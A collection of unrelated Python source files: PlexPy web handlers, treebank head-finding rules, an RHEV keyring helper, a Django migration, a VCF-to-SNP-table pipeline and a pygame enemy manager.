    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(data)
@cherrypy.expose
def get_stream_type_by_top_10_platforms(self, time_range='30', y_axis='plays', **kwargs):
    """Graph data: stream types of top-10 platforms, as JSON; None (with a warning) on failure."""
    data = graphs.Graphs().get_stream_type_by_top_10_platforms(time_range=time_range, y_axis=y_axis)
    if not data:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(data)
@cherrypy.expose
def get_friends_list(self, **kwargs):
    """Relay the Plex.tv friends list as JSON; None (with a warning) on failure."""
    payload = plextv.PlexTV().get_plextv_friends('json')
    if not payload:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return payload
@cherrypy.expose
def get_user_details(self, **kwargs):
    """Relay the Plex.tv user details as JSON; None (with a warning) on failure."""
    payload = plextv.PlexTV().get_plextv_user_details('json')
    if not payload:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return payload
@cherrypy.expose
def get_server_list(self, **kwargs):
    """Relay the Plex.tv server list as JSON; None (with a warning) on failure."""
    payload = plextv.PlexTV().get_plextv_server_list('json')
    if not payload:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return payload
@cherrypy.expose
def get_sync_lists(self, machine_id='', **kwargs):
    """Relay the Plex.tv sync lists for a server as JSON; None (with a warning) on failure."""
    payload = plextv.PlexTV().get_plextv_sync_lists(machine_id=machine_id, output_format='json')
    if not payload:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return payload
@cherrypy.expose
def get_servers(self, **kwargs):
    """Relay the PMS server list as JSON; None (with a warning) on failure."""
    payload = pmsconnect.PmsConnect().get_server_list(output_format='json')
    if not payload:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return payload
@cherrypy.expose
def get_servers_info(self, **kwargs):
    """Return PMS server info as JSON; None (with a warning) on failure."""
    info = pmsconnect.PmsConnect().get_servers_info()
    if not info:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(info)
@cherrypy.expose
def get_server_prefs(self, **kwargs):
    """Relay all PMS server preferences as JSON; None (with a warning) on failure."""
    payload = pmsconnect.PmsConnect().get_server_prefs(output_format='json')
    if not payload:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return payload
@cherrypy.expose
def get_activity(self, **kwargs):
    """Return the current PMS activity as JSON; None (with a warning) on failure."""
    activity = pmsconnect.PmsConnect().get_current_activity()
    if not activity:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(activity)
@cherrypy.expose
def get_full_users_list(self, **kwargs):
    """Return the full Plex.tv users list as JSON; None (with a warning) on failure."""
    user_list = plextv.PlexTV().get_full_users_list()
    if not user_list:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(user_list)
@cherrypy.expose
def refresh_users_list(self, **kwargs):
    """Kick off a background refresh of the users table."""
    threading.Thread(target=plextv.refresh_users).start()
    logger.info('Manual user list refresh requested.')
@cherrypy.expose
def get_sync(self, machine_id=None, user_id=None, **kwargs):
    """Return synced items for a server (defaults to this server) as JSON."""
    # The server identity is always fetched, matching the original flow,
    # even when an explicit machine_id is supplied.
    server_id = pmsconnect.PmsConnect().get_server_identity()

    target = machine_id if machine_id else server_id['machine_identifier']
    synced = plextv.PlexTV().get_synced_items(machine_id=target, user_id=user_id)

    if synced:
        output = {"data": synced}
    else:
        logger.warn('Unable to retrieve sync data for user.')
        output = {"data": []}

    cherrypy.response.headers['Content-type'] = 'application/json'
    return json.dumps(output)
@cherrypy.expose
def get_sync_item(self, sync_id, **kwargs):
    """Relay one sync item as JSON; None (with a warning) on failure."""
    payload = pmsconnect.PmsConnect().get_sync_item(sync_id, output_format='json')
    if not payload:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return payload
@cherrypy.expose
def get_sync_transcode_queue(self, **kwargs):
    """Relay the sync transcode queue as JSON; None (with a warning) on failure."""
    payload = pmsconnect.PmsConnect().get_sync_transcode_queue(output_format='json')
    if not payload:
        logger.warn('Unable to retrieve data.')
        return None
    cherrypy.response.headers['Content-type'] = 'application/json'
    return payload
@cherrypy.expose
def get_server_pref(self, pref=None, **kwargs):
    """Return a single PMS preference value; None (with a warning) on failure."""
    value = pmsconnect.PmsConnect().get_server_pref(pref=pref)
    if not value:
        logger.warn('Unable to retrieve data.')
        return None
    return value
@cherrypy.expose
def get_plexwatch_export_data(self, database_path=None, table_name=None, import_ignore_interval=0, **kwargs):
    """Validate a PlexWatch database and start a background import of it.

    Returns a status string for the UI; the import itself runs in a thread.
    """
    from plexpy import plexwatch_import

    db_check_msg = plexwatch_import.validate_database(database=database_path,
                                                      table_name=table_name)
    if db_check_msg == 'success':
        threading.Thread(target=plexwatch_import.import_from_plexwatch,
                         kwargs={'database': database_path,
                                 'table_name': table_name,
                                 'import_ignore_interval': import_ignore_interval}).start()
        return 'Import has started. Check the PlexPy logs to monitor any problems.'
    else:
        return db_check_msg
@cherrypy.expose
def plexwatch_import(self, **kwargs):
    """Render the PlexWatch database import page."""
    return serve_template(templatename="plexwatch_import.html", title="Import PlexWatch Database")
@cherrypy.expose
def get_server_id(self, hostname=None, port=None, **kwargs):
    """Query /identity on an arbitrary PMS host and relay the XML response.

    Returns None when hostname/port are missing or the request fails.
    """
    from plexpy import http_handler

    if not (hostname and port):
        return None

    handler = http_handler.HTTPHandler(host=hostname,
                                       port=port,
                                       token=None)
    response = handler.make_request(uri='/identity',
                                    proto='http',
                                    request_type='GET',
                                    output_format='',
                                    no_token=True)
    if not response:
        logger.warn('Unable to retrieve data.')
        return None

    cherrypy.response.headers['Content-type'] = 'application/xml'
    return response
@cherrypy.expose
def random_arnold_quotes(self, **kwargs):
    """Return a random Arnold Schwarzenegger quote for the countdown page.

    Uses random.choice instead of randint-plus-index (the old code also
    wrapped an already-int randint result in int()).
    """
    from random import choice
    quote_list = ['To crush your enemies, see them driven before you, and to hear the lamentation of their women!',
                  'Your clothes, give them to me, now!',
                  'Do it!',
                  'If it bleeds, we can kill it',
                  'See you at the party Richter!',
                  'Let off some steam, Bennett',
                  'I\'ll be back',
                  'Get to the chopper!',
                  'Hasta La Vista, Baby!',
                  'It\'s not a tumor!',
                  'Dillon, you son of a bitch!',
                  'Benny!! Screw you!!',
                  'Stop whining! You kids are soft. You lack discipline.',
                  'Nice night for a walk.',
                  'Stick around!',
                  'I need your clothes, your boots and your motorcycle.',
                  'No, it\'s not a tumor. It\'s not a tumor!',
                  'I LIED!',
                  'See you at the party, Richter!',
                  'Are you Sarah Conner?',
                  'I\'m a cop you idiot!',
                  'Come with me if you want to live.',
                  'Who is your daddy and what does he do?'
                  ]
    return choice(quote_list)
@cherrypy.expose
def get_notification_agent_config(self, config_id, **kwargs):
    """Render the configuration modal for one notification agent."""
    config = notifiers.get_notification_agent_config(config_id=config_id)

    checkboxes = {'email_tls': checked(plexpy.CONFIG.EMAIL_TLS)}

    return serve_template(templatename="notification_config.html", title="Notification Configuration",
                          data=config, checkboxes=checkboxes)
@cherrypy.expose
def get_notification_agent_triggers(self, config_id, **kwargs):
    """Render the trigger modal for one notification agent.

    Returns None for a non-numeric config_id; renders with data=None when
    no agent matches.
    """
    if not config_id.isdigit():
        return None

    wanted_id = int(config_id)
    this_agent = next((agent for agent in notifiers.available_notification_agents()
                       if agent['id'] == wanted_id), None)

    return serve_template(templatename="notification_triggers_modal.html",
                          title="Notification Triggers",
                          data=this_agent)
@cherrypy.expose
def delete_history_rows(self, row_id, **kwargs):
    """Delete session-history rows; answers a JSON status message.

    Preserves the original quirk: when the delete call returns a falsy
    message, nothing is returned and no content-type header is set.
    """
    if not row_id:
        cherrypy.response.headers['Content-type'] = 'application/json'
        return json.dumps({'message': 'no data received'})

    message = datafactory.DataFactory().delete_session_history_rows(row_id=row_id)
    if message:
        cherrypy.response.headers['Content-type'] = 'application/json'
        return json.dumps({'message': message})
@cherrypy.expose
def delete_all_user_history(self, user_id, **kwargs):
    """Delete all history for one user; answers a JSON status message.

    Preserves the original quirk: when the delete call returns a falsy
    message, nothing is returned and no content-type header is set.
    """
    if not user_id:
        cherrypy.response.headers['Content-type'] = 'application/json'
        return json.dumps({'message': 'no data received'})

    message = datafactory.DataFactory().delete_all_user_history(user_id=user_id)
    if message:
        cherrypy.response.headers['Content-type'] = 'application/json'
        return json.dumps({'message': message})
|
"""treetools: Tools for transforming treebank trees.
transformations: constants and utilities
Author: Wolfgang Maier <maierw@hhu.de>
"""
from . import trees
# Head-finding rules for the Penn Treebank (Collins-style head percolation).
# For each (lowercased) parent category: a list of (direction, priority
# labels) rules.  Labels are given as a single space-separated string; an
# empty string means "take the outermost child in the scan direction".
HEAD_RULES_PTB = {
    'adjp' : [('left-to-right', 'nns qp nn $ advp jj vbn vbg adjp jjr np jjs dt fw rbr rbs sbar rb')],
    'advp' : [('right-to-left', 'rb rbr rbs fw advp to cd jjr jj in np jjs nn')],
    'conjp' : [('right-to-left', 'cc rb in')],
    'frag' : [('right-to-left', '')],
    'intj' : [('left-to-right', '')],
    'lst' : [('right-to-left', 'ls :')],
    'nac' : [('left-to-right', 'nn nns nnp nnps np nac ex $ cd qp prp vbg jj jjs jjr adjp fw')],
    'pp' : [('right-to-left', 'in to vbg vbn rp fw')],
    'prn' : [('left-to-right', '')],
    'prt' : [('right-to-left', 'rp')],
    'qp' : [('left-to-right', ' $ in nns nn jj rb dt cd ncd qp jjr jjs')],
    'rrc' : [('right-to-left', 'vp np advp adjp pp')],
    's' : [('left-to-right', ' to in vp s sbar adjp ucp np')],
    'sbar' : [('left-to-right', 'whnp whpp whadvp whadjp in dt s sq sinv sbar frag')],
    'sbarq' : [('left-to-right', 'sq s sinv sbarq frag')],
    'sinv' : [('left-to-right', 'vbz vbd vbp vb md vp s sinv adjp np')],
    'sq' : [('left-to-right', 'vbz vbd vbp vb md vp sq')],
    'ucp' : [('right-to-left', '')],
    'vp' : [('left-to-right', 'to vbd vbn md vbz vb vbg vbp vp adjp nn nns np')],
    'whadjp' : [('left-to-right', 'cc wrb jj adjp')],
    'whadvp' : [('right-to-left', 'cc wrb')],
    'whnp' : [('left-to-right', 'wdt wp wp$ whadjp whpp whnp')],
    'whpp' : [('right-to-left', 'in to fw')]
}
# Head-finding rules for the German NeGra/TIGER treebanks, same format as
# HEAD_RULES_PTB.  A category may carry several rules; they are tried in
# order until one yields a head.
HEAD_RULES_NEGRA = {
    's' : [('right-to-left', 'vvfin vvimp'),
           ('right-to-left', 'vp cvp'),
           ('right-to-left', 'vmfin vafin vaimp'),
           ('right-to-left', 's cs')],
    'vp' : [('right-to-left', 'vvinf vvizu vvpp'),
            ('right-to-left', 'vz vainf vminf vmpp vapp pp')],
    'vz' : [('right-to-left', 'vvinf vainf vminf vvfin vvizu'),
            ('left-to-right', 'prtzu appr ptkzu')],
    'np' : [('right-to-left', 'nn ne mpn np cnp pn car')],
    'ap' : [('right-to-left', 'adjd adja cap aa adv')],
    'pp' : [('left-to-right', 'kokom appr proav')],
    'co' : [('left-to-right', '')],
    'avp' : [('right-to-left', 'adv avp adjd proav pp')],
    'aa' : [('right-to-left', 'adjd adja')],
    'cnp' : [('right-to-left', 'nn ne mpn np cnp pn car')],
    'cap' : [('right-to-left', 'adjd adja cap aa adv')],
    'cpp' : [('right-to-left', 'appr proav pp cpp')],
    'cs' : [('right-to-left', 's cs')],
    'cvp' : [('right-to-left', 'vz')],
    'cvz' : [('right-to-left', 'vz')],
    'cavp' : [('right-to-left', 'adv avp adjd pwav appr ptkvz')],
    'mpn' : [('right-to-left', 'ne fm card')],
    'nm' : [('right-to-left', 'card nn')],
    'cac' : [('right-to-left', 'appr avp')],
    'ch' : [('right-to-left', '')],
    'mta' : [('right-to-left', 'adja adjd nn')],
    'ccp' : [('right-to-left', 'avp')],
    'dl' : [('left-to-right', '')],
    'isu' : [('right-to-left', '')],
    'ql' : [('right-to-left', '')],
    '-' : [('right-to-left', 'pp')],
    'cd' : [('right-to-left', 'cd')],
    'nn' : [('right-to-left', 'nn')],
    'nr' : [('right-to-left', 'nr')],
    'vroot' : [('left-to-right', '$. $')]
}
def get_headpos_by_rule(parent_label, children_label, rules,
                        default=0):
    """Given parent and children labels and head rules,
    return position of lexical head.

    Args:
        parent_label: label of the parent node (matched case-insensitively
            against the rule table keys).
        children_label: sequence of the children's label strings.
        rules: head-rule table such as HEAD_RULES_PTB/HEAD_RULES_NEGRA,
            mapping category -> list of (direction, priority-label-string).
        default: position returned when the parent has no rule.

    Returns:
        Index of the head child, or 0 if no rule label matches.

    Raises:
        ValueError: if a rule direction is neither 'left-to-right' nor
            'right-to-left'.

    Fixes over the previous version: the direction string 'right-to_left'
    was misspelled (empty right-to-left rules raised ValueError); the
    priority string was iterated character by character instead of being
    split into label words, so multi-letter labels could never match; and
    a misplaced ``return 0`` aborted the search after the first priority
    label in right-to-left rules.
    """
    if not parent_label.lower() in rules:
        return default
    for hrule in rules[parent_label.lower()]:
        direction = hrule[0]
        if direction not in ('left-to-right', 'right-to-left'):
            raise ValueError("unknown head rule direction")
        labels = hrule[1].split()
        if not labels:
            # Empty priority list: pick the outermost child in scan terms.
            if direction == 'left-to-right':
                return len(children_label) - 1
            return 0
        # Scan order over the children for this rule's direction.
        if direction == 'left-to-right':
            indices = range(len(children_label))
        else:
            indices = range(len(children_label) - 1, -1, -1)
        # Labels are tried in priority order; the first child whose parsed
        # label matches wins.
        for label in labels:
            for i in indices:
                parsed_label = trees.parse_label(children_label[i].lower())
                if parsed_label.label.lower() == label:
                    return i
    return 0
|
import getpass
import optparse

import keyring

from rhev_functions import *
description = """
RHEV-keyring is a script for mantaining the keyring used by rhev script for storing password
"""
p = optparse.OptionParser("rhev-clone.py [arguments]", description=description)
p.add_option("-u", "--user", dest="username", help="Username to connect to RHEVM API", metavar="admin@internal",
default=False)
p.add_option("-w", "--password", dest="password", help="Password to use with username", metavar="admin",
default=False)
p.add_option("-W", action="store_true", dest="askpassword", help="Ask for password", metavar="admin", default=False)
p.add_option('-q', "--query", action="store_true", dest="query", help="Query the values stored", default=False)
(options, args) = p.parse_args()
if options.askpassword:
options.password = getpass.getpass("Enter password: ")
if options.query:
print "Username: %s" % keyring.get_password('rhevm-utils', 'username')
print "Password: %s" % keyring.get_password('rhevm-utils', 'password')
if options.username:
keyring.set_password('rhevm-utils', 'username', options.username)
if options.password:
keyring.set_password('rhevm-utils', 'password', options.password)
|
import os,sys,re
RELEASE_FILE = "/etc/redhat-release"
RWM_FILE = "/etc/httpd/conf.modules.d/00-base.conf"

if os.path.isfile(RELEASE_FILE):
    # e.g. "CentOS Linux release 7.9.2009 (Core)" -> word 2 is "release",
    # word 3 is the version string.
    with open(RELEASE_FILE, "r") as f:
        rel_list = f.read().split()
    # Compare version components numerically: the old string-tuple compare
    # ordered "10" before "8".  Non-numeric components are skipped.
    version = tuple(int(p) for p in rel_list[3].split(".") if p.isdigit())
    if rel_list[2] == "release" and version < (8, 5):
        print("so far good")
    else:
        # The old code did `raise("...")`, which raises TypeError in
        # Python 3 (exceptions must derive from BaseException).
        raise Exception("Unable to find the OS version")

if os.path.isfile(RWM_FILE):
    print("re write")
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter catalogue.Jeux.image: the ImageField now allows NULL values."""

    dependencies = [
        ('catalogue', '0014_auto_20170414_0845'),
    ]

    operations = [
        migrations.AlterField(
            model_name='jeux',
            name='image',
            field=models.ImageField(null=True, upload_to='photos_jeux/', verbose_name='Image'),
        ),
    ]
|
import os
import random
__author__ = 'duceppemo'
class SnpTableMaker(object):
    """
    Everything is ran inside the class because data structures have to be
    shared across parent and child process during multi threading
    """
    # Pipeline (run from the constructor): parse reference + VCFs, reconcile
    # AC=1 positions that are AC=2 elsewhere, collect per-sample alleles,
    # keep only informative positions, then write fasta files, a root
    # sequence, counts and the SNP table.  Python 2 code (print statements,
    # iteritems, long).

    def __init__(self, args):
        import os
        import sys
        import glob
        import multiprocessing
        # Define variables based on supplied arguments
        self.args = args
        self.ref = args.ref
        if not os.path.isfile(self.ref):
            sys.exit('Supplied reference genome file does not exists.')
        self.vcf = args.vcf
        if not os.path.isdir(self.vcf):
            sys.exit('Supplied VCF folder does not exists.')
        self.minQUAL = args.minQUAL
        if not isinstance(self.minQUAL, (int, long)):
            sys.exit('minQual value must be an integer')
        self.ac1_report = args.ac1
        self.section4 = args.section4
        self.output = args.output
        if not os.path.isdir(self.output):
            os.makedirs(self.output)
        self.table = args.table
        # number of threads to use = number of cpu
        # (NOTE(review): self.cpus is set but no multiprocessing pool is
        # visible in this class — confirm whether it is still used.)
        self.cpus = int(multiprocessing.cpu_count())
        # create dictionaries to hold data
        self.refgenome = dict()           # chrom -> Bio SeqRecord
        self.vcfs = dict()                # sample -> chrom -> pos -> [ALT]
        self.ac1s = dict()                # sample -> chrom -> [pos] with AC=1
        self.ac2s = dict()                # sample -> chrom -> [pos] with AC=2
        self.allac2 = dict()              # chrom -> [pos] AC=2 in any sample
        self.finalac1 = dict()            # AC=1 positions also seen as AC=2
        self.fastas = dict()              # sample -> chrom -> pos -> [allele]
        self.counts = dict()              # chrom -> pos -> distinct alleles
        self.informative_pos = dict()     # subset of fastas with >1 allele
        # create a list of vcf files in vcfFolder
        self.vcfList = list()
        for filename in glob.glob(os.path.join(self.vcf, '*.vcf')):
            self.vcfList.append(filename)
        # run the script
        self.snp_table_maker()

    def snp_table_maker(self):
        """Run the whole pipeline; order matters (later steps clear the
        data structures built by earlier ones)."""
        self.parse_ref()
        self.parse_vcf()
        self.find_ac1_in_ac2()
        self.write_ac1_report()
        self.get_allele_values()
        self.get_informative_snps()
        self.count_snps()
        self.write_fasta()
        self.write_root()
        self.write_snp_table()

    def parse_ref(self):
        """Load the reference genome as a dict of SeqRecords keyed by chromosome."""
        from Bio import SeqIO
        print ' Parsing reference genome'
        fh = open(self.ref, "rU")
        self.refgenome = SeqIO.to_dict(SeqIO.parse(fh, "fasta"))
        fh.close()

    def parse_vcf(self):
        """Parse every VCF, binning QUAL-filtered positions into AC=1/AC=2."""
        import sys
        print ' Parsing VCF files'
        for samplefile in self.vcfList:
            sample = os.path.basename(samplefile).split('.')[0]  # get what's before the first dot
            self.vcfs[sample] = dict()
            with open(samplefile, 'r') as f:  # open file
                for line in f:  # read file line by line
                    line = line.rstrip()  # chomp -> remove trailing whitespace characters
                    if line:  # skip blank lines or lines with only whitespaces
                        if line.startswith('##'):  # skip comment lines
                            continue
                        elif line.startswith('#CHROM'):
                            # sanity check: column 10 holds the sample name
                            sample_name = line.split("\t")[9]
                            if sample_name != sample:
                                sys.exit('File name and sample name inside VCF file are different: %s'
                                         % samplefile)
                        else:
                            # chrom, pos, alt, qual = [line.split()[i] for i in (0, 1, 4, 5)]
                            chrom = line.split()[0]
                            pos = int(line.split()[1])
                            alt = line.split()[4]
                            qual = line.split()[5]  # string -> needs to be converted to integer
                            if qual != '.':
                                try:
                                    qual = float(qual)
                                except ValueError:
                                    qual = int(qual)
                            else:
                                continue  # skip line
                            # INFO field starts with the AC (allele count) tag
                            ac = line.split()[7].split(';')[0]
                            # http://www.saltycrane.com/blog/2010/02/python-setdefault-example/
                            self.vcfs.setdefault(sample, {}).setdefault(chrom, {}).setdefault(pos, [])\
                                .append(alt)
                            if ac == 'AC=1' and qual > self.args.minQUAL:
                                self.ac1s.setdefault(sample, {}).setdefault(chrom, []).append(pos)
                            elif ac == 'AC=2' and qual > self.args.minQUAL:
                                self.ac2s.setdefault(sample, {}).setdefault(chrom, []).append(pos)
                                # This is equivalent, but faster?
                                try:
                                    if pos not in self.allac2[chrom]:  # only add is not already present
                                        self.allac2.setdefault(chrom, []).append(pos)
                                except KeyError:  # chromosome does not exist in dictionary
                                    self.allac2.setdefault(chrom, []).append(pos)

    def find_ac1_in_ac2(self):
        """Keep AC=1 positions that are AC=2 in at least one other sample."""
        print ' Finding AC=1/AC=2 positions'
        if isinstance(self.ac1s, dict):  # check if it's a dict before using .iteritems()
            for sample, chromosomes in self.ac1s.iteritems():
                if isinstance(chromosomes, dict):  # check for dict
                    for chrom, positions in chromosomes.iteritems():
                        if isinstance(positions, list):  # check for list
                            for pos in positions:
                                if pos in self.allac2[chrom]:  # check ac1 in ac2
                                    self.finalac1.setdefault(sample, {}).setdefault(chrom, []).append(pos)

    def write_ac1_report(self):
        """Write the AC=1-also-in-AC=2 report (self.ac1_report path)."""
        print " Writing AC=1/AC=2 report to file"
        # free up resources not needed anymore
        self.ac1s.clear()
        fh = open(self.ac1_report, 'w')
        if isinstance(self.finalac1, dict):
            for sample, chromosomes in sorted(self.finalac1.iteritems()):
                if isinstance(chromosomes, dict):
                    for chrom, positions in sorted(chromosomes.iteritems()):
                        if isinstance(positions, list):
                            fh.write("{}\nAC=1 is also found in AC=2 in chromosome {}".format(sample, chrom) +
                                     " at position(s): " + ', '.join(map(str, positions)) + "\n\n")
        fh.close()

    def get_allele_values(self):
        """For every AC=2 position in any sample, record this sample's allele:
        the ALT when the sample itself has AC=2 (or a confirmed AC=1),
        otherwise the reference base."""
        print ' Getting allele values'
        for sample in self.ac2s:
            for chrom in self.ac2s[sample]:
                for pos in self.allac2[chrom]:
                    # if in AC=2 for that sample
                    if pos in self.ac2s[sample][chrom]:
                        allele = ''.join(self.vcfs[sample][chrom][pos])  # convert list to string
                    else:
                        try:  # use a try here because some samples are not in finalac1
                            # if in AC=1 for that sample, but also in AC=2 in other sample
                            if pos in self.finalac1[sample][chrom]:
                                allele = ''.join(self.vcfs[sample][chrom][pos])  # convert list to string
                            else:
                                allele = self.refgenome[chrom].seq[pos - 1]
                        except KeyError:
                            allele = self.refgenome[chrom].seq[pos - 1]
                    self.fastas.setdefault(sample, {}).setdefault(chrom, {}).setdefault(pos, []).append(allele)
                    # Track all alleles for each position
                    try:
                        if allele not in self.counts[chrom][pos]:
                            self.counts.setdefault(chrom, {}).setdefault(pos, []).append(allele)
                    except KeyError:
                        self.counts.setdefault(chrom, {}).setdefault(pos, []).append(allele)

    def get_informative_snps(self):
        """SNPs position that have at least one different ALT allele within all the samples"""
        print ' Getting informative SNPs'
        # free up resources not needed anymore
        self.ac2s.clear()
        self.allac2.clear()
        self.finalac1.clear()
        # need to get the positions in the same order for all the sample (sort chrom and pos)
        for sample in self.fastas:
            for chrom in sorted(self.fastas[sample]):
                for pos in sorted(self.fastas[sample][chrom]):
                    if len(self.counts[chrom][pos]) > 1:  # if more that one ALT allele, keep it
                        allele = ''.join(self.fastas[sample][chrom][pos])  # convert list to string
                        # check if allele is empty
                        if allele:
                            self.informative_pos.setdefault(sample, {}).setdefault(chrom, {})\
                                .setdefault(pos, []).append(''.join(allele))
                        else:
                            print "No allele infor for {}, {}:{}".format(sample, chrom, pos)

    def count_snps(self):
        """Print and append (to section4) filtered vs informative SNP counts."""
        print ' Counting SNPs'
        # free up resources not needed anymore
        self.counts.clear()
        # All samples should have the same number of informative SNPs
        # so any can be used to get the stats
        randomsample = random.choice(self.informative_pos.keys())
        filteredcount = 0
        informativecount = 0
        # Account for multiple chromosome
        for chrom in self.fastas[randomsample]:
            filteredcount += len(self.fastas[randomsample][chrom])  # number of positions
            informativecount += len(self.informative_pos[randomsample][chrom])
        # print to screen
        print "\nTotal filtered SNPs: {}".format(filteredcount)
        print "Total informative SNPs: {}\n".format(informativecount)
        # write to file
        fh = open(self.section4, "a")  # append mode
        fh.write("Total filtered SNPs: {}\n".format(filteredcount))
        fh.write("Total informative SNPs: {}\n\n".format(informativecount))
        fh.close()

    def write_fasta(self):
        """Write one aligned fasta per sample from the informative positions."""
        print ' Writing sample fasta files'
        # free up resources not needed anymore
        self.fastas.clear()
        # Create output folder for fasta files
        if not os.path.exists(self.output):
            os.makedirs(self.output)
        if isinstance(self.informative_pos, dict):
            for sample, chromosomes in sorted(self.informative_pos.iteritems()):
                samplepath = os.path.join(self.output, sample + '.fas')
                # NOTE(review): fh is never closed explicitly; left to GC.
                fh = open(samplepath, 'w')
                fh.write(">{}\n".format(sample))
                if isinstance(chromosomes, dict):
                    for chrom, positions in sorted(chromosomes.iteritems()):
                        if isinstance(positions, dict):
                            for pos, allele in sorted(positions.iteritems()):
                                if isinstance(allele, list):
                                    fh.write(''.join(allele))  # convert list to text
                fh.write("\n")

    def write_root(self):
        """Write root.fas: reference bases at every informative position."""
        print ' Writing root fasta file'
        rootpath = os.path.join(self.output, 'root.fas')
        randomsample = random.choice(self.informative_pos.keys())
        rootseq = list()
        # NOTE(review): fh is never closed explicitly; left to GC.
        fh = open(rootpath, 'w')
        if isinstance(self.informative_pos, dict):
            for chrom in self.informative_pos[randomsample]:
                for pos in sorted(self.informative_pos[randomsample][chrom]):
                    rootseq.append(self.refgenome[chrom].seq[pos - 1])
            fh.write(">root\n" + "{}\n".format(''.join(rootseq)))

    def write_snp_table(self):
        """Write the TSV SNP table: reference rows, then one row per sample."""
        print ' Writing SNP table'
        fh = open(self.table, 'w')
        randomsample = random.choice(self.informative_pos.keys())
        ref_pos = list()
        ref_call = list()
        # reference
        if isinstance(self.informative_pos, dict):
            for chrom in self.informative_pos[randomsample]:
                for pos in sorted(self.informative_pos[randomsample][chrom]):
                    ref_pos.append(''.join(chrom) + '-' + str(pos))
                    ref_call.append(self.refgenome[chrom].seq[pos - 1])
            fh.write("reference_pos\t{}\n".format("\t".join(ref_pos)))
            fh.write("reference_call\t{}\n".format("\t".join(ref_call)))
        # sample
        if isinstance(self.informative_pos, dict):
            for sample, chromosomes in self.informative_pos.iteritems():
                fh.write("{}".format(sample))
                if isinstance(chromosomes, dict):
                    for chrom, positions in sorted(chromosomes.iteritems()):
                        if isinstance(positions, dict):
                            for pos, allele in sorted(positions.iteritems()):
                                if isinstance(allele, list):
                                    allele = ''.join(allele)  # convert list to text
                                    fh.write("\t{}".format(allele))
                fh.write("\n")
        fh.close()
if __name__ == '__main__':
    from argparse import ArgumentParser

    # Command-line front end: collect the arguments and hand them to
    # SnpTableMaker, whose constructor runs the whole pipeline.
    parser = ArgumentParser(description='Generate SNP table and aligned fasta files from VCF files')
    parser.add_argument('-r', '--ref', metavar='ref.fasta',
                        required=True,
                        help='reference genome used in the VCF files')
    parser.add_argument('-v', '--vcf', metavar='vcfFolder',
                        required=True,
                        help='location of the VCF files')
    parser.add_argument('-q', '--minQUAL', metavar='minQUAL', type=int,
                        required=True,
                        help='minimum QUAL value in VCF file')
    parser.add_argument('-ac1', '--ac1', metavar='AC1Report.txt',
                        required=True,
                        help='output file where positions having both AC=1 and AC=2 are reported')
    parser.add_argument('-s4', '--section4', metavar='section4.txt',
                        required=True,
                        help='output file where total filtered SNP positions and total informative SNPs are reported')
    parser.add_argument('-o', '--output', metavar='fastaOutFolder',
                        required=True,
                        help='folder where the output fasta files will be output')
    parser.add_argument('-t', '--table', metavar='fastaTable.tsv',
                        required=True,
                        help='the SNP table')

    # Get the arguments into an object
    arguments = parser.parse_args()
    SnpTableMaker(arguments)
|
import sys, pygame, frametime, properties, random
from enemy import Enemy
class Enemies:
    """Manage all on-screen Enemy sprites: spawning, movement, drawing
    and removal.

    NOTE(review): enemies/blackSurface/screen are *class* attributes, so
    every Enemies instance shares them — the game presumably uses a single
    instance; confirm before creating more.
    """
    enemies = []
    # Solid-black surface the size of one enemy, used to erase an enemy's
    # previous position before redrawing it.
    blackSurface = pygame.Surface([Enemy.enemy.get_width(), Enemy.enemy.get_height()])
    blackSurface.fill([0,0,0])
    screen = None

    def set_screen(self, screen):
        """Remember the surface enemies are drawn onto."""
        self.screen = screen

    def create(self):
        """Spawn one enemy at a random horizontal position inside the window."""
        #range that the current player ship can shoot
        where_spawn = random.randint(1, properties.width - Enemy.enemy.get_width())
        lenemy = Enemy(where_spawn)
        self.enemies.append(lenemy)

    def move(self, bullet):
        """Advance all enemies one frame, redraw them, and cull the ones
        that left the screen.

        Returns the list of rects that need a display update.
        """
        to_update = []
        if frametime.can_create_enemy():
            self.create()
        to_delete = []
        to_update += [x.enemyrect for x in self.enemies]
        for i in range(len(self.enemies)):
            self.enemies[i].update(bullet)
            self.screen.blit(self.blackSurface, self.enemies[i].enemyrect)
            self.screen.blit(Enemy.enemy, self.enemies[i].enemyrect)
            # If enemy goes off the bottom of the screen
            # (800 is presumably the window height — TODO confirm against
            # properties).
            if self.enemies[i].enemyrect.top > 800:
                to_delete.append(i)
        # BUGFIX: delete from the highest index down.  Removing in ascending
        # order shifts the remaining indices, so the wrong enemies were
        # removed (or IndexError raised) when several left in one frame.
        for x in reversed(to_delete):
            self.remove(x)
        to_update += [x.enemyrect for x in self.enemies]
        return to_update

    def getEnemies(self):
        """Return the live enemy list (shared, not a copy)."""
        return self.enemies

    def remove(self, index):
        """Erase and delete the enemy at *index*; return its rect for the
        display update, or None when the index is stale."""
        try:
            to_update = self.enemies[index].enemyrect
            self.screen.blit(self.blackSurface, self.enemies[index].enemyrect)
            del self.enemies[index]
            return to_update
        except IndexError:
            print("IndexError for enemy {0} of {1}".format(index, len(self.enemies)))

    def game_over(self):
        """Erase every enemy from the screen and clear the list in place."""
        for i in range(len(self.enemies)):
            self.screen.blit(self.blackSurface, self.enemies[i].enemyrect)
        del self.enemies[:]
|
import logging
from pyramid.view import view_config, view_defaults
from pyramid.httpexceptions import HTTPFound
from . import BaseView
from ..models import DBSession
from ..models.account_item import AccountItem
